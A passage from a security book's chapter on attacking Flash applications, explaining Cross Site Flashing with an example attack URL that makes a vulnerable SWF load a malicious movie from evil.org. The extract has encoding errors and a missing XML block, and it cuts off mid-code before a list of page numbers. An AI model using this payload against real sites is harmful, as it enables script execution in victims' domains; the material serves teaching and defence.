Here??™s an example
attack URL:
http://example.com/VulnerableMovie.swf?userinput3= http%3A//evil.org/
HackWorld.swf%3F
The attacker must place the HackWorld SWF on his or her web site (say, evil.org) and
place an insecure security policy on the site. Namely, add the file http://evil.org/
crossdomain.xml, containing this:
Flash Player would first query the attack site for the crossdomain.xml security policy.
Once it sees that it is allowed to access HackWorld, VulnerableMovie would load
Chapter 9: Attacking Flash Applications 235
HackWorld, and in turn, HackWorld would execute the JavaScript in the domain who
hosts VulnerableMovie (such as example.com and not evil.org).
Stefano Di Paolo calls this Cross Site Flashing (XSF). XSF has the same impact as XSS.
Namely, this attack would load HackWorld in the domain of the vulnerable SWF, and in
turn, HackWorld would execute its malicious JavaScript in the example.com domain.
The question mark (?) %3F character at the end of this attack string is unnecessary to
attack VulnerableMovie, but it acts like a comment. If the vulnerable code was this,
loadMovie(_root.
Pages:
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409